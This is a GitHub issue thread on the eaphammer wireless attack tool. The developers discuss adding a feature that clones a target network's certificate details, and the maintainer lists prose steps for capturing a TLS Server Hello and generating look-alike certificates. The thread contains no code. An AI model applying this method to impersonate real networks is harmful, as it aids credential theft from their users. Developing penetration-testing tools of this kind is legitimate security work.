eaphammer icon indicating copy to clipboard operation
eaphammer copied to clipboard

Published 20 hours ago verified publisher icon s0lst1c3

Feature Request: Clone cert details from target networks

Open thesle3p opened this issue 7 years ago • 9 comments

Would it be possible to add functionality to eaphammer to enumerate Certificate information from the network we wish to impersonate and automatically feed that into the cert-wizard? It would speed up the process of deploying eaphammer.

thesle3p avatar Feb 04 '18 21:02 thesle3p

Awesome idea. We'll definitely get this added within the next couple of releases.

s0lst1c3 avatar Feb 16 '18 04:02 s0lst1c3

@s0lst1c3 how do you envision this working? I've got a few ideas, but want to see what you had in mind.

kmackinley avatar Mar 12 '18 20:03 kmackinley

You give it the essid of a in proximity network and it would request and parse it's ssl cert info from that network and automatically pass it to the cert wizzard.

On Mar 12, 2018 4:38 PM, "kmackinley" [email protected] wrote:

@s0lst1c3 https://github.com/s0lst1c3 how do you envision this working? I've got a few ideas, but want to see what you had in mind.

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/s0lst1c3/eaphammer/issues/32#issuecomment-372454240, or mute the thread https://github.com/notifications/unsubscribe-auth/AIqhyNr1HlNJyxuO9V49YFXm-I-PnNuFks5tdtyvgaJpZM4R4uRX .

thesle3p avatar Mar 12 '18 20:03 thesle3p

Thats what I thought, just wanted to clarify, thanks for the info.

kmackinley avatar Mar 12 '18 20:03 kmackinley

At a high level, you'd want to use the following steps:

  1. Accept target ESSID and interface from user
  2. Begin sniffing for SSL/TLS Server Hello packets on provided interface (using Scapy or similar)
  3. Initiate an authentication attempt against target ESSID using call to wpa_supplicant or similar
  4. When SSL/TLS Server Hello packet is detected, bail out of the authentication attempt
  5. Extract the SSL certificate from the Server Hello packet and parse it for metadata
  6. Generate new snakeoil certificates

If you check out packet 125 in the this pcap file you'll see what I mean:

https://mrncciew.files.wordpress.com/2014/08/eap-peap-7921.zip

Feel free to take a whack at this yourselves if you're up for it. I'm currently in the process of adding 802.11n/802.11ac support, which is forcing me to do some minor refactoring due to design decisions I made a year ago. No big deal, but it means I probably won't have time to start on this for a couple of weeks.

s0lst1c3 avatar Mar 13 '18 05:03 s0lst1c3

You may want to borrow code from eapeak instead https://github.com/securestate/eapeak/blob/master/eapeak

thesle3p avatar Apr 13 '18 18:04 thesle3p

Would be awesome if we could integrate eaphammer with https://github.com/sensepost/apostille or implement similar functionality as a module.

s0lst1c3 avatar Apr 15 '19 23:04 s0lst1c3

Hi all. I had written a python script, with similar functionality to apostille, that could be adapted for this feature: https://gist.github.com/tyrells/4667515e4d54ab1c01a48aa323a30ce5.

This script will take an input directory/file, parse all exported certificates and attempt to clone a selected certificate chain.

tyrells avatar Sep 21 '20 17:09 tyrells

That is baddass. I will attempt to incorporate this in the near future and make sure to credit you.

s0lst1c3 avatar Sep 22 '20 02:09 s0lst1c3